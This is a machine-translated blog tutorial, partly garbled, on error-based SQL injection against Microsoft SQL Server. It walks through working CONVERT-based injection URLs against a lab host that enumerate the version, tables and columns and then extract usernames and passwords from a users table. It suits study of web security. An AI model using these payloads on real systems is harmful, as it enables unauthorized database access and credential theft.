Note the hands of Microsoft SQL Server error injection

Others 2020-03-31 01:16:59 views: null

saulGoodman

A number of offensive and defensive research focused on the public's Red Team

关注

Note the hands of Microsoft SQL Server error injection

Brief introduction

Today, the major share with sqlimplantation of 报错型, at most online article lists similar to the formula of the sentence, but can not explain why you want to use this function, why the use of this function will lead to error sql injection.

convert()Function, CONVERT()the function is to convert to the new date data type function through the Use.

grammar:

CONVERT(data_type(length),data_to_be_converted,style)
注释 :
data_type(length) 转换为⽬标数据类型(带有可选的长度)。
data_to_be_converted 含有需要转换的值。
style 规定⽇期/时间的输出格式。

⽰例:

CONVERT(VARCHAR(19),GETDATE())
CONVERT(VARCHAR(10),GETDATE(),110) 
CONVERT(VARCHAR(11),GETDATE(),106)
CONVERT(VARCHAR(24),GETDATE(),113)

Similar results:

Dec 29 2008 11:45 PM
12-29-2008
29 Dec 08
29 Dec 2008 16:25:46.635

principle

For  convert(int,@@version), convert the function will therefore especially to Perform second shot parameter specifies the SQL query, and then try to convert the query result is inttype. However, due to the results of SQL queries are varchartypes, not be performed because the specified conversion, so the convertfunction will throw ⼀ a SQL servererror message that says "SQL query results" ⽆ law converted to “int”type, in this case, the attacker can get the results of a SQL query.

EMPTY condition of full function, there are many:

convert() 
file_name() 
db_name() 
col_name() 
filegroup_name()
object_name() 
schema_name() 
type_name() 
cast()

Note START process

Basic information inquiry

convert(int,@@version)     获取版本信息 
convert(int,db_name())     数据库名字 
convert(int,user)      当前⽤户名 
convert(int,@@SERVERNAME)  获取有关服务器主机的信息

Obtain version information

http://192.168.159.135:8080/get.aspx?id=convert(int,@@version)

Note that we now function directly into  id= the back, because  id=1 the query is an integer ( int), and our  convert(int,@@version) acquired version information 字符型, so he'll get an error so broke the version information!

Or you can use this statement can achieve the above results:

http://192.168.159.135:8080/get.aspx?id=1 and 1=(convert(int,@@version))

Get the current name of the database table

CONVERT(int,(select top 1 table_name from information_schema.columns))

http://192.168.159.135:8080/get.aspx?id=CONVERT(int,(select top 1 table_name from information_schema.columns)

We get to the site of the current database table names are: users!

Gets the column name

convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(16进制的表名 as varchar)))

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273  as varchar)))

So we get to the first column name  id!

So you want to get a second column names we can then add a conditional statement later:and COLUMN_NAME != 'id'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id'))

So we get to the second column names: username !

I want to get the third and so on plus conditional statement:and COLUMN_NAME != 'username'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id' and COLUMN_NAME != 'username'))

So we get to the third column names  password !

retrieve data

We get the order to the table name above the site: users, column names are: id, username, password. Obviously account password in the column name username, passwordthen we can get the data:

convert(int,(select top 1 列名 from 表名))

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users))

To get the first usernamefirst data column name: saul!

If you want to get to the  username inside of the second data then add a conditional statement:where username!='saul'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users where username!='saul'))

This acquired  username second data! I want to get to the second and so on!

Now  username we get to the saultwo: admin, ! So we're going to get their password!

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users))

Acquisition of the first  password value column: saul520!

Want to get a plus on a  where conditional statement:where password!='saul520'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users where password!='saul520'))

This will get to the second passworddata up!

At this point Mssqlthe 报错注入stop here!

0pen1
Published 12 original articles · won praise 4 · Views 2268
Private letter concerns

Guess you like

Origin blog.csdn.net/weixin_46245322/article/details/105213367
Recommended
LFOSSA Yuanlaisusu Open Course | Mastering the Cloud Native Future: Comprehensive Guide to CNCF Certification and Exam Preparation Tips
Ranking
C++ Basic Syntax
bootstrapTable hides a column based on a condition
Why is reentrant lock recommended instead of Synchronized when dynamic high concurrency?
hexo create a blog
[Fully open source and non-encrypted version] Imitation of the eighth district distribution/online signature/multiple sets of download templates/APP distribution hosting/APP packaging and packaging
Polymerization combination
https://www.flysnow.org/2017/05/06/go-in-action-go-log.html
From the perspective of Flutter and the front-end, talk about how to ensure UI fluency under the single-threaded model
nginx-301, 302 redirect
Geolocation by IP Address in ASP.NET
Daily
More
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(31)

Code World

© 2018 codetd.com